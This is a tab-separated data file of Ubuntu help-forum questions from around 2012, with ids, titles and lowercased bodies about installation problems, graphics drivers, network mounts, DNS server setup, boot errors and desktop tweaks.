206796	is there a abcde equivalent for dvd/blu-ray discs ?	when i converted my cd collection to mp3 several years ago , i used abcde . the workflow basically went like this : insert cd run abcde abcde ejects the disc repeat i 'm looking for a similar workflow for converting my dvd/blu-ray collection as well , but so far have n't found anything quite the same . i 'm sure i could script something with handbrake 's cli , but i 'm hoping someone else has already solved that problem for me .
206797	what software do i use in 12.10 to rotate a video 90 degrees ?	i am using ubuntu 12.10 . i have some videos that i want to rotate 90 degrees . what software do i use ?
206799	how can i make networkmanager call ddclient automatically	how can i make ddclient update my dyndns address whenever networkmanager makes or cuts a connection ?
206800	bug on chrome 22.0.1229.94	i 'm running ubuntu 12.04 ( x64 ) and since chrome has updated to 22.0.1229.94 issues are happening in some sites like facebook , on scroll page : i tried versions 23 ( beta ) and 24 ( unstable ) and the issue appear too , i guess some dependency is causing that . someone have suggestions ?
206804	is ubuntu sso provider intended for normal people ?	i am looking for an sso / openid provider software to run on my server . can ubuntu sso provider be recommended for that ? is it intended for normal people in terms of maintainability , stability , security , etc. ? if so , can it be used with mysql or even better ldap ? or is it porstgres only ? are there any packages available or are there plans to get this software into the ubuntu repositories ?
206807	how to remove universal access from the notification area ?	i just installed 12.10 with gnome 3.6 and in the notification area left to the clock there is a icon for universal access . how is it possible to remove that notification icon ?
206810	how can i get a list of installed programs and corresponding size of each in ubuntu ?	i would like to have a list of the installed software on my machine , with the disk space consumed by them . a previous answer here says `` you can do this via gui in synaptic '' . this does n't mean anything to me . i do n't know what gui is , and when i click on synaptic , i do not get anything like the display shown in the answer , i.e . with `` settings â preferences '' and `` columns and fonts '' . in windows , you just select 'programs and applications ' in the control panel , and the list comes up immediately , with sizes . is there something similar and simple with ubuntu ? could the size of each program be included on the list of installed software ? this would be the most obvious place to put it .
206812	installation on sony vaio vgn-fe690	i can not install ubuntu 12.04 on my sony vaio vgn-fe690 . when it shows the window to type my name and password the window closes .
206813	can i have two ubuntu installations on one laptop ?	can i have 2 ubuntus 12.10 on my laptop ? i need 1 for work , and 1 as desktop . will it work if i install new version as usual , beside existing one ? i ca n't lose data from my actual ubuntu , but want to have new one too . i have many services running ( mysql , rabbitmq , apache , memcached etc . ) and i do n't want to run them all the time . that 's why i want second os to use it as normal desktop .
206818	how to access an os x keychain via ubuntu	i need to access some of the content of an old os x keychain . i know the password - this is n't about cracking ; - ) what i do n't have is a mac . i do have the keychain files on a backup drive . is there any way to get at the contents on an ubuntu box ? a port of the os x /usr/bin/security somewhere for example ? a definitive `` no '' would be as useful as a `` yes '' .
206820	`` switch applications '' does not work in 12.10	since upgrading to 12.10 , sometimes `` switch applications '' does not work . pressing alt+tab works as pressing only tab key . and it does not work even if i change the shortcut key to ctrl+tab or any other .
206822	how to unhide an application ?	i hope you can help me . i have installed ubuntu 12.04 using wubi , my issue is i installed iptux using ubuntu software center , it worked fine , i decided that i wanted it to be hidden at start up , so i changed its setting in preferences . i assumed that if i needed to use it i could go to internet menu and select it . but after restarting i found that after i click on iptux under internet nothing happens , but i click it after that then a small window shows fatal error ! ! failed to bind the tcp/udp port ( 2425 ) ! address already in use . i have tried uninstalling using ubuntu software center and reinstalling it but it still had the same problem . i thought it maybe because some files were not uninstalled by usc , so i installed synaptic and uninstalled iptux ( complete uninstallation ) and then reinstalled it and the same situation occurs . i was hoping someone could inform me how i could unhide iptux .
206824	how to watch apple keynote videos from the website	i just noticed that i am unable to watch apple 's keynote videos on ubuntu 12.10 . neither firefox nor google chrome works . i am however , able to view all the advertisement videos for all products on apple 's website . the link to the keynote video is here any help would be appreciated .
206825	i want to pass an argument into a variable ?	i am very new to the linux environment , and i am stuck with a situation . what i want to do is to pass the command test -s $ testfile to a variable , like , say `` tes '' example : tes= '' test -s $ testfile ''
206830	ubuntu will not install on my dell inspiron 580	i 'm trying to install ubuntu on my inspiron 580 ( intel core i3 4gb ram intel hd graphics ) but am having no success installing from cd or windows installer all result in a purple rapidly flashing screen with the ubuntu with 5 dots below it splash which does n't change . i have tried releases 12.04.1 lts ( cd and windows installer ) , 11.10 ( cd after reading it was certified for the 580 ) and today 12.10 ( cd ) all produce the same install failure . my dell 1704pt monitor is connected to the intel hd board using an hdmi to dvi adaptor though i have tried a vga cable and still got the same flashing screen . any help gratefully received as i want to get away from windows 7 home premium .
206843	nfs4 + idmap , incorrect user name mapping	i tried to follow the ubuntu nfs4 documentation as closely as possible . my client machine is showing incorrect file ownerships . this is my idmapd.conf file on both machines : [ general ] verbosity = 0 pipefs-directory = /run/rpc_pipefs domain = localdomain [ mapping ] nobody-user = nobody nobody-group = nogroup [ translation ] method=nsswitch yet , the client shows the ownership of files based on the numerical uid/gid instead of mapping the user and group names . i have the same user names on both machines , but the uids are not the same . so when i ls -l the directory on the client , it shows the files as owned by a different user which shares the same uid as the intended user on the server . what am i doing wrong ?
206846	upgrading win7 to win8 on a dual boot with ubuntu 12.04	please can someone comment if my current setup of windows 7 with dual boot of ubuntu 12.04 will continue to boot and work ok after upgrade my win 7 to win8 or are there things i need to do first ? thanks
206851	ubuntu 12.04 desktop & taskbars	just installed ubuntu 12.04 on a spare drive and do n't like the desktop & taskbars . how do i change them to the ones i have on version 10.04 ?
206854	problems with my password	my problem is that i changed my username and computer name in ubuntu 12.04 , when i restarted , the machine does not recognize my password , but it did recognize the new names user and computer . when i started as guest session i get the name of ( pc ) as administrator , but i ca n't seem to login with my old account . i will be very grateful for your help .
206860	ubuntu 12.10 recognizes me only 3gb of free space	i have installed ubuntu 12.10 64-bits and it worked perfectly ( during days ) , until now . suddenly several error messages coming from anywhere tell me that i have no free space on the disk . and now the disk usage analyzer application show me this : i have open this application one day before and the quota of that partition was 2 % . as if it had ridiculously increased in one day from 1g to 64g . you can see that this is wrong with this image : another thing is that , since i installed ubuntu ( from the iso and without upgrade ) , all the times that i initialize the system , it checks the disk for errors . i rebooted three times my system , and now my system is working good . now i have 61gb of free space . is my disk with serious problem or is a bug of quantal ? as the problem has been resolved instantly without changing anything , should i do something to prevent it ? should i report this as a bug ? how ?
206861	how to disable unity from starting with ubuntu 12.04 lts	i am temparaly useing ubuntu 12.04 lts server on my laptop to host a minecraft server on and i installed ubuntu-desktop and now it auto starts with ubuntu and i want it to start as a cli not the desktop i needed the gui to set up the server at first then i can mantain it from the cli so i was wondering if anyone knows how to disable unity from starting with ubuntu ? i would still like to start unity with startx command if i ever need it
206866	ubuntu wo n't load up	i 'm having trouble with ubuntu . it was working fine on weds 24/08/12 . fired up my laptop yesterday and came up with the grub screen . what i basically want to know is how do i get back to normal service ? i 'm pretty illiterate when it comes to ubuntu/linux systems . i think i 'm running the latest version of ubuntu . currently using the 11.10 trial which i burnt to disc to use my laptop at the minute to post this question . this is the first screen i get come up . 'http : //img.photobucket.com/albums/v419/r1187/20121025_173033.jpg' following the first option it just takes me to a black screen with a flashing underscore . pretty sure it does n't allow me to enter any text . when i follow the second option i get this screen : i 've tried following the advice on this question , but it has n't done the trick . it keeps asking me if it 's mounted . any help will be appreciated . ideally i 'd like to get things back to normal . failing that copying my data from the hard drive to an external one and reinstalling ubuntu would be fine .
206870	what is the cost for becoming a reseller partner of ubuntu ?	i 'm interested about ubuntu reseller partnership , but i 'm not getting full info for this ; like how i need to pay them ( will it be case to case , annually or monthly ) ? when i 'll sale their ubuntu advantage support , then how i 'll be benefited ? when i 'm clicking on the `` contact '' button of canonical website it takes me to `` becoming a partner '' page , but fact is that before apply for a partnership i need to know about this fully .
206872	kde on virtualbox already running gnome ?	what is the smartest/easiest way to get kde installed on a vm that is already running gnome ? would it be better to create a complete new vm just for kde ( because they do n't work well together ? ) if the best way to do this is in fact to create a new vm , on virtualbox the only ubuntus that it has is 32 and 64 bit , it does not specify gnome or kde , it just defaults i think to gnome . thanks so much for your guidance !
206878	how to disable automount for internal partitions ?	how can i disable automount for ntfs/fat partitions from internal diskdrives in ubuntu 12.10 ?
206881	how do i create an overlayfs on nfs on a diskless device ?	looking for example/howto/etc of howto create an overlayfs for my diskless computers . i have multiple diskless computers that have root on nfs configured . i would like to use an overlay for files that need to be changed for the computes . like /etc/hostname and /etc/fstab , etc ... anyone have this working that can give me a reference url ?
206883	how to prevent files from being shown in unity dash ?	i do n't want file names to be completed in my unity dash , for privacy and security reasons . is there a way to disable files from being shown in the dash ? note that i am able to hide recently used documents from dash , using the privacy settings . what i am interested in is hiding all documents from dash .
206887	download file does not do anything	1 saved download file ( iso ) to usb stick but it does n't do anything other than want to creat a dvd . 2 saved the file to hard drive but it can not be read by windows . is there a way to download the working program directly to the usb stick ?
206895	how to enable wireless on nexus 7	how do i enable wireless on my nexus 7 running ubuntu on nexus7 ? when i click the network manager icon its not showing any available networks .
206899	locally stream media files	is there any easy way to locally stream media files over a network ( to other ubuntu machines ) ? i tried using ssh , but that 's too slow for anything , and i ca n't figure out anything that would allow me to stream any video fast enough .
206901	upgrade to 12.10 failed . now it wont start , hangs	may have started 2 instances of upgrade ( to quivering quagga - i call it that because my machine is now extinct ) , stops and hangs halfway through startup . always at same point . can i work out the order of what is loading and work out which service is failing by determining the last successful service to startup ? my edubuntu graphic logo doesnt show but a character kubuntu with the 4 rotating dots ..
206902	cups : restrict printer access to trusted users on network	i would like to share my printer ( connected to my computer with usb ) with my colleague though our network . i am very concerned with security issues and i do n't want to do anything that could ( potentially ) leave a door open to hackers . what is the safest way to share a printer on the network with cups ? thank you for your help !
206907	how to mount an iso image in ubuntu 12.04	i wish to mount an iso image and then install a set-up inside the image . its an iso of a game btw . i have tried mounty , gmount and furious iso and none of them worked .
206915	squid3 dns resolution error	squid3 on ubuntu 12.04 returns ipv6 addresses instead of ipv4 . i have no ipv6 network therfeore connection fails . dns resolution directly on the server returns ipv4 addresses .
206916	how can i make preview windows for chrome/chromium display window contents for minimized chrome windows ?	if i have multiple gedit ( for example ) windows open , with some of them minimized , and i click on the gedit launcher icon twice , it shows previews of all gedit windows ... including the minimized ones . if i do the same with chrome , it shows previews for all open chrome windows , but the chrome windows that are minimized are just white and do n't show the window contents . how do i fix this ?
206918	asus tf700t ubuntu/android dual boot	i want to dual boot my transformer infinity . i like android , but as an it student it can not do everything i need homework wise , besides pocket minecraft sucks . so i want to have my cake and eat it too . if anyone knows how i would appreciate a how to .
206920	kde skin in unity after installing kde	i 'm using ubuntu 12.10 and i just installed kde , so i could have both desktop environments and switch between on the login screen . however , when i logged back in with unity , some programs now show up with the kde skin . is there any way to have both desktops separate , without any graphical overlap ? i must say , the only programs that keep the gnome/unity skin seem to be those developed by canonical , while others ( including programs offered by canonical , such as firefox ) do change it .
206927	what is the ( initial ) root password for ubuntu on nexus 7 ?	is it possible to install anything on nexus 7 ' ubuntu ? i installed ubuntu , booted , but there 's only default admin account .
206928	cifs shares do not mount after upgrade to 12.10 from 12.04	i have seen issues close to my problem but no one seems to have a definitive answer as to what is going on and why the failure occurs . i have a number of nas devices on my home network and on a previous install of 12.04 and version prior mounting at login worked using this entry for each in fstab : //servername/sharename /media/windowsshare cifs guest , uid=1000 , iocharset=utf8 , codepage=cp850 , cp850 0 0 now when i use this , 12.10 reports the standard - can not mount bad option ... blah blah ... the kern log reports that the cifs option `` codepage '' unknown ... changed entry to `` unicode '' and received the same error message . there are no other error messages or log entries that would indicate another issue , but this is the statement i used for quite awhile with version 12.04 and before . is the codepage option obsolete in 12.10/cifs now ? is there a codepage support program that i must load ? is there some kind of helper program that is required to supports the codepage option ? a current review of the man pages at samba.org does not make mention of the option `` codepage '' . extremely confused - any help/insight would be greatly appreciated .
206933	ubuntu 12.10 's desktop getting dark	i installed 12.10 32bit . it is going well . some little issues , but just normal for a recent version . the problem that is really boring me and i ca n't find the solution is that my desktop is frequently getting dark . all the windows , the wallpaper and the top bar are getting dark . but not the unity bar . it is like when a programs is not working . i ca n't predict when but it happens every day . if i close and reopen some program , it gets normal . but only this one , not the others . the only solution is restart ubuntu . somebody has the same problem ? any tip ?
206940	is there a proprietary driver ( nvidia or ati ) that actually works with 12.10 ?	note : i see many similar topics on this , but i 've tried all their suggestions , and nothing has worked . the main difference seems to be : i always get a black screen with a blinking cursor , while others seem to get through the boot-up and see distorted graphics or just their wallpaper . issue : i do a clean install of ubuntu 12.10 . boots fine with the “nouveau” graphics driver – graphics ( even just menus ) are very slow , choppy , and distorted . the three other driver options in ubuntu ( official nvidia drivers ) , all result in a variation of the black screen on boot up . there will be no access to a command line/gui in anyway what-so-ever ( tried every option recommended out there , but the system is unusable at this stage ) . i can only reinstall , and try different drivers…and i only ever get one shot at it . questions : -does anyone know of a proprietary driver that will actually work on 12.10 with a nvidia or ati card ? -should i just buy a newer graphics card to put in as a replacement ? more info : this is my second computer , and i’m just trying to get a working install of ubuntu on it . i don’t want to put much money into it , as i have seen ubuntu run great on much older/less capable machines . i’ve got a decent'ish core2duo intel processor ( 2.13ghz ) , 2gb of ram , 320gb hard drive , 32-bit architecture , and there is no other o/s installed . it appears as if the graphics card ( nvidia geforce 7350 le ) is holding me back . tried so far : -all drivers available in ubuntu *all fail -manual install of some different nvidia drivers *all fail -also tried installing the generic kernel , nvidia driver does n't work in 12.10 *no difference -tried installing 12.04 *same results -every method suggested to at least get a command line after switching to a nvidia driver *all fail -update- re-tried everything above with a new nvidia geforce 210 ... same results for everything . -update # 2- re-tried everything above with a new amd radeon hd 6450 ... installed the proprietary driver from ubuntu 's `` software sources '' menu ... everything now works . see `` answer '' below for summary .
206941	how to integrate pidgin and evolution into the message indicator ?	i upgraded to 12.10 , i was using unity 2d , but as it no longer exists i moved to gnome classic , something in the upgrade seems to have change the message indicator in the `` indicator applet complete '' . how do i integrate pidgin and evolution into the message indicator , there is only a button to launch pidgin , but a new message does not change the colour of the icon or show up in the dropdown part . also when minimizing pidgin it minimizes like a normal window instead of minimizing to the applet . there is nothing in the menu for evolution at all .
206942	can i become an ubuntu member by contributing on ask ubuntu ?	the ubuntu membership wiki states : contributions are valued and recognized whether you contribute to artwork , any of the locoteams , documentation , providing support on the forums , the answers tracker , irc support , bug triage , translation , development and packaging , marketing and advocacy , contributing to the wiki , or anything else . this defines what contributions will be considered valuable when applying for ubuntu membership . what i want to know is , does my involvement on ask ubuntu fall under the stipulation `` ... or anything else '' ? i 'd imagine they do n't literally mean anything else , just things considered to fit the scope of contributing to ubuntu . so is my help here valuable in contributing ? has anyone ever obtained membership by using their ask ubuntu contributions as their argument toward membership ?
206944	what are some known vpn servers which work well with ios and osx clients ?	i am looking for a stable vpn server which is known to work with ios and osx clients . if possible , i prefer packages that are installable via : sudo apt-get install xxx .
206945	how to upload photos from shotwell ?	i only started using ubuntu a couple months ago . i 've been able to get pictures from my camera onto the machine . the system is very different for me and i 'm trying to work it out on my own , but i have a homework assignment that requires me to upload jpg files of photos i take and i 'm having a problem . when i click the button on the page to choose a file , i go into the different photo files and nothing shows up , but the screen where files would be turns a very faint orange , just a tint . i 've tried putting the named photos on my desktop , but the upload screen does n't recognize it at all . how can i use this software to upload my pictures ?
206950	how to understand ubuntu uefi secure boot install ?	now that secure boot is supported , what special instructions does one have to follow to install ubuntu on a uefi secure boot enabled pc shipped with windows 8 ? as i understand , ubuntu > = 12.04.2 ships with signed grub2 . i searched but can not get past the `` supported '' statement . i am looking for specific instructions on registering ubuntu keys to let the firmware boot ubuntu . update : thanks . secureboot in ubuntu 12.10 gives me the answer . the ubuntu first-stage efi bootloader is signed by microsoft . the last time i read , ubuntu had plans to publish their own key which had to be registered in the firmware 's database before installing . may be i did not track the story long enough to realize that it is not the case anymore .
206951	is it possible to power down my external via the eject button ?	i 'm trying to convert from windows 7 to ubuntu 12.10 with gnome 3.6 . using the notification area 's eject icon , i notice the partition is unmounted but the drive is still powered and spinning ... i understand the latter can be taken care of by means of udisks -- detach /dev/sdb i really do n't want to have to run a command everytime i eject . windows does the whole process when ejecting a medium via the systray . is there a way i could add in the command to the eject button ? is there an appropriate place i could file a feature request ? little things like this are making it hard for me to swap back over to linux . thanks for the support !
206955	update manager wo n't open ( error related to pythonverbose )	i 'm having an issue with update-manager . last night , my computer restart suddenly during the update process . now it wo n't open and it keep appearing on the notifier with a message warning that an error occurred . the error is the same that is displayed when i try to open it on the terminal : error in sitecustomize ; set pythonverbose for traceback : eoferror : eof read where not expected traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 26 , in < module > from __future__ import print_function eoferror : eof read where not expected i 've already seen some questions here , but most of them are related to problems with ppas and the source.list file . this seems to be a bug on update-manager itself . i 've already tried to remove it and install again , but the problem persists . i also noted another bug : my source-center does n't open too . the message for it is similar to the other one : error in sitecustomize ; set pythonverbose for traceback : eoferror : eof read where not expected traceback ( most recent call last ) : file `` /usr/lib/command-not-found '' , line 5 , in < module > from __future__ import absolute_import , print_function eoferror : eof read where not expected for now i 'm using apt-get update & & upgrade for updating and the synaptic for the source management . but i really would like to fix this stuff . anyone can help ? i 'm with ubuntu 12.10 , gnome-remix , 64-bits .
206958	how to create vvvvvv ( game ) launcher ?	i recently bought vvvvvv ( game ) from the ubuntu software centre . sadly , there is no desktop launcher for the game ! meaning , i ca n't find it using the dash . when i enter /usr/share/applications though , the game is there . when i click it , this pops up : clicking `` run '' starts the game perfectly , but this is n't a user friendly way of starting it . is there a way to create a desktop launcher for vvvvvv ?
206967	why is n't grub2 using custom resolution ?	i hope somebody can help me with this ... running ubuntu 12.10 gnome remix i am trying to get grub2 to use a resolution of 1600x900 ... i have checked vbeinfo and hwinfo -- framebuffer which both provide : mode 0x037f : 1600x900 ( +6400 ) , 24 bits this resolution has worked on previous ubuntu and fedora installs . here is my /etc/default/grub : http : //paste.ubuntu.com/1308444/ line 25 = grub_gfxmode= '' 1600x900 '' as well as my /boot/grub/grub.cfg : http : //paste.ubuntu.com/1308446/ line 72 = set gfxmode=1600x900 i have tried using grub-customizer : why is it not taking effect ? ? i have tried different resolutions ... backgrounds and font colours are changeable . thank you for your insight .
206974	ubuntu 12.04 lts server not allowing incoming connections when using wlan0	i have set up my computer with ubuntu server temporally for a minecraft server lan party i have port forwarded the correct ports but when trying to connect i get connection refused : connect or connection timed out : connect when i try to ping the local ip i get destination host unreachable . it works fine if i plug in an ethernet cord but at the party i will not have that option and there for need help allowing connections to come in from wlan0 any help is greatly appreciated
206975	touchpad sensitivity issue even after upgrading to ubuntu 12.10	still having this problem on ubuntu 12.10 touchpad twitchy on an hp g62 with a synps/2 synaptics touchpad even after i upgraded to 12.10 . same problem here posted 2 days ago touchpad sensitivity i really have no idea what the problem is and why they did n't fix it . using this os less and less 'cause of this . great os but synaptics su kc s .
206984	installation on a nexus 7 gets stuck while flashing the root filesystem	well , a good chunk of my day has been spent on what was supposed to take minutes ... here 's the rundown every time , i get stuck while flashing the root file system ( freezing , timing out , or error message ) i seemingly followed all of the steps and troubleshoots , and repeated them , no such luck . i would not count it out that i still messed one of them up , but does anyone have any ideas ?
206987	how to install window theme on ubuntu without sudo privileges ?	i want to install a theme but , i need sudo ! im running ubuntu 12.10 ( gnome 3 ) . the theme in question is called `` notxp theme '' . i do n't have sudo privilege on my machine . is there a way to install the theme despite that fact ?
206989	10.04 drops to ' ( initramfs ) ' prompt on boot	i 'm not sure what to do to solve the problem , i received this error upon boot . mount : mounting /dev/disk/by-uuid/f60e3ce2-0237-45bb-bf07-581d0090cbc7 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have /sbin/init . no init found . try passing init= bootarg . busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu11 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _
206993	`` no such file or directory '' error when downloading with 'youtube-dl '	every time i try to download youtube videos using youtube-dl it gives me this : error : unable to open for writing : [ errno 2 ] no such file or directory : < br > 'filename.mp4.part' how can i fix this ? any ideas ?
206999	`` loading operating system ... boot error '' when booting from live cd	i 'm having a problem installing ubuntu 12.10 on a new drive . i was running windows7 on my ssd but when the drive crashed , i decided to use that as an excuse to make the switch to ubuntu . i 've been experimenting with it on my old laptop until i got my ssd replaced under warranty . now i have my ssd back and want to install ubuntu on my desktop machine . i used unetbootin to make a bootable flash drive . i then i went into my bios and made sure usb loaded before the hard drive . however , when i try to load it i get an error that says : loading operating system ... boot error i know the flash drive works because if i reboot my laptop or my other windows pc with the flash drive and it loads into ubuntu ... just when i try to do it in the pc with no os currently on the drive .
207012	can not boot windows 7 or boot from any bootable media	i deleted the ubuntu partition via windows 7 . i rebooted the machine and i it drops to a grub rescue prompt . i tried to boot from ubuntu live dvd , usb and windows 7 repair cd , but did n't succeed . i also tried to changed the boot sequence on the bios to boot from cd/dvd , but got the same . i also updated the bios to the latest thinking it might be a bios issue but got the same . machine comes up to grub rescue prompt .
207017	display cuts off launcher , everything 's blurry , hulu choppy , system slower than vista	just installed 12.10 64bit . display cuts off launcher , every thing 's blurry , hulu choppy , overall the system is slower than vista . i 'm guessing it 's a gpu problem ? i have a geforce 9300m , but the 'system details ' shows 'graphics : unknown ' . where do i start ?
207019	bind9 server not responding to external queries	i have set up a bind server on my dedicated box which i want to host a nameserver for my domain on . when i use dig @ 202.169.196.59 nzserver.co.nz locally on the server i get the following response ... ; < < > > dig 9.8.1-p1 < < > > @ 202.169.196.59 nzserver.co.nz ; ( 1 server found ) ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 43773 ; ; flags : qr aa rd ra ; query : 1 , answer : 1 , authority : 2 , additional : 2 ; ; question section : ; nzserver.co.nz . in a ; ; answer section : nzserver.co.nz . 3600 in a 202.169.196.59 ; ; authority section : nzserver.co.nz . 3600 in ns ns2.nzserver.co.nz . nzserver.co.nz . 3600 in ns ns1.nzserver.co.nz . ; ; additional section : ns1.nzserver.co.nz . 3600 in a 202.169.196.59 ns2.nzserver.co.nz . 3600 in a 202.169.196.59 ; ; query time : 0 msec ; ; server : 202.169.196.59 # 53 ( 202.169.196.59 ) ; ; when : sat oct 27 15:40:45 2012 ; ; msg size rcvd : 116 which is good , and is the output i want . but when simply using dig nzserver.co.nz i get ... ; < < > > dig 9.8.1-p1 < < > > nzserver.co.nz ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : servfail , id : 16970 ; ; flags : qr rd ra ; query : 1 , answer : 0 , authority : 0 , additional : 0 ; ; question section : ; nzserver.co.nz . in a ; ; query time : 308 msec ; ; server : 202.169.192.61 # 53 ( 202.169.192.61 ) ; ; when : sat oct 27 17:09:12 2012 ; ; msg size rcvd : 32 and if i use dig @ 202.169.196.59 nzserver.co.nz on another linux machine i get ... ; < < > > dig 9.7.3 < < > > @ 202.169.196.59 nzserver.co.nz ; ( 1 server found ) ; ; global options : +cmd ; ; connection timed out ; no servers could be reached am i doing something wrong here ? port 53 is definitely open . /etc/bind/named.conf.options options { directory `` /var/cache/bind '' ; forwarders { 202.169.192.61 ; 202.169.206.10 ; } ; listen-on { 202.169.196.59 ; } ; } ; /etc/bind/named.conf.local zone `` nzserver.co.nz '' { type master ; file `` /etc/bind/nzserver.co.nz.zone '' ; } ; /etc/bind/nzserver.co.nz.zone ; bind db file for nzserver.co.nz $ origin nzserver.co.nz . @ in soa ns1.nzserver.co.nz . mr.steven.french.gmail.com . ( 2012102606 28800 7200 864000 3600 ) ns ns1.nzserver.co.nz . ns ns2.nzserver.co.nz . mx 10 mail.nzserver.co.nz . @ in a 202.169.196.59 * in a 202.169.196.59 ns1 in a 202.169.196.59 ns2 in a 202.169.196.59 www in a 202.169.196.59 mail in a 202.169.196.59 netstat -tupanl | grep `` :53 `` tcp 0 0 202.169.196.59:53 0.0.0.0 : * listen 8250/named tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 8250/named udp 0 0 202.169.196.59:53 0.0.0.0 : * 8250/named udp 0 0 127.0.0.1:53 0.0.0.0 : * 8250/named
207020	command for enabling networking ?	what is the command for enabling networking and wireless using commandline ? i have made a script that delays the startup apps for quicker boot times . i have learned that disabling networking also helps in a quicker boot time . i would like to add a command that shall enable networking and wireless in the shell script .
207022	has the minimize speed been increased in 12.10 ?	in ubuntu 12.10 , by default , the minimize speed had been kept considerably slow in order to let users know where the window has minimized to ... but all of a sudden i noticed that now the speed is as normal as earlier versions ! has there been an update that again increased this speed ?
207023	how can i stop certain xfce components from starting with unity ?	i 've installed xubuntu-desktop , and of course this pulled in all the usual xfce components . the only problem i have , is that xfce 's notification daemon and xfconfd keep starting with unity . this means notify-osd is not being used , and i must manually load it every time i log in . how can i remedy this problem ?
207032	gnome-shell extensions panel position	is it possible to change the extension position ( by modifying the extension.js ) in gnome-shell status area ? i mean that i 'd like to see the language indicator in the first position ( from left to right ) , cuz it 's visually easier to find it .
207037	no puedo actualizar las actualizaciones en ubuntu 12.10 ? / can not update in ubuntu 12.10	he intentado actualizarlo , llendo al dash , entrar a actualizacion de software y esperar a que me diga que actualizara . pero me aparece que fallo al descargar la informacion del repositorio . compruebe conexion a internet ( el cual funciona bien ) . si alguien me dice como arreglar el problema , o como actualizar desde consola , se lo agradeceria . pd : esto es parte de lo que aparece en detalles : w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/mobile/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/mobile/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found translation i tried to update , going to the dash , go to software update and wait for it to tell me to update . but it appears that it failed to download the information from the repository . check connection to the internet ( which works fine ) . if someone tells me how to fix the problem , or how to upgrade from console , i would appreciate it . ps : this is part of what appears in details : w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/mobile/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/mobile/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found
207042	how to change selection color in kubuntu 12.04	before posting a question here i have gone through search in askubutu and got this question but that did n't help me . may be that suitable for ubuntu with gnome etc . but not good for kubuntu . some can give me a way to change icon selection color in kubuntu 12.04 . thank you .
207046	how to use ram disk for certain application	i have creat ram disk for chrome like this : http : //www.kevingunn.org/ ? p=210 i ' d like to use light read on ram disk . what should i do ? 1 ) most of our commands require superuser privileges , so we might as well just switch to root . sudo su - 2 ) edit your startup script : nano /etc/rc.local right above “exit 0″ we’ll add the commands that need to run each time at startup : mkdir /tmp/ram mount -t tmpfs -o size=512m , mode=750 tmpfs /tmp/ram/ chown -r yourusername /tmp/ram/ ( replace “yourusername” with your user name ) save the changes and exit ( ctrl-o , ctrl-x ) . 3 ) edit your boot configuration : nano /etc/default/grub change the grub_cmdline_linux line to read : grub_cmdline_linux=”ramdisk=512000″ and again save and exit . 4 ) reboot and verify that /tmp/ram now exists with “drwxr-x—” rights with you as the owner . 5 ) relocate your existing browser ( no need to do this as root ) cache and link to it : for chromium : rm -rf ~/.cache/chromium ln -s /tmp/ram ~/.cache/chromium for google chrome : rm -rf ~/.cache/google-chrome/ ln -s /tmp/ram ~/.cache/google-chrome for mozilla firefox : the cache for firefox can be found inside your firefox profile ( which includes a big random string in it ) . as long as you only have one firefox profile you can do this : cd ~/.mozilla/firefox/*default rm -rf cache ln -s /tmp/ram cache
207052	installing ubuntu 12.04 along windows xp and windows 7	i have windows xp installed on c : drive and windows 7 installed on f : drive . i want to install ubuntu 12.04 along with windows ( keeping both xp and 7 ) in drive g : without losing any data stored in the computer . i have a hard disk of 500 gb size with c : ( 14.8 gb left ) , d : , e : , f : , and g : ( 15.7 gb left ) . i tried to install ubuntu 12.04 from dvd and getting stuck at the time of selecting partitions . how do i select the device for boot loader installation ? will the installation of ubuntu into g : drive affects the data stored in the hard disk or in g : drive especially ? after installing ubuntu can i use windows xp and windows 7 ? this is my first attempt to use ubuntu . can any body help me please ?
207057	installed ubuntu over windows	i need to get those windows files . please let me know whether there is any procedure to get those windows files
207058	weird xdg user dir resetting bug	i have a weird problem with 12.04 lts . regardless of what i do to the ~/.config/user-dirs.dirs file , whenever i login again the next time , that file gets all set to $ home only . something is happening during login using lightdm that overrides the contents of that file . if i login and do a xdg-user-dirs-update -- force then the contents of the file are ok. after i logout , the file is still ok . it 's when i login again using lightdm that something goes wrong . it 's quite annoying .
207064	upgrading ubuntu + kde desktop from 12.04 to 12.10	i installed ubuntu ( not kubuntu ) 12.04 lts , and afterwards switched desktop from unity to kde . i have two related questions : if i upgrade to 12.10 using the updater , would it delete the kde ? and if i install it using the kde updater ( from the pop-up announcing kubuntu 12.10 is available ) , would it install kubuntu and not ubuntu ? how should i proceed without messing up my system ?
207065	ubuntu installer does n't see internal hard drive on dell vostro 3360	i just received a new dell vostro 3360 , it has windows 7 preinstalled . when it comes to the partition window i ca n't see the hard drive there . i see only /dev/sda or /dev/sdb ( either one and in both cases it 's a usb drive from which i 'm installing ) . i tried every imaginable bios configuration . tried to change the sata mode to ata , dhci and more . edit : i tried to install with standard ubuntu 12.04 32 bit , and 11.10 64 bit official versions . no luck . i 'll appreciate any suggestion .
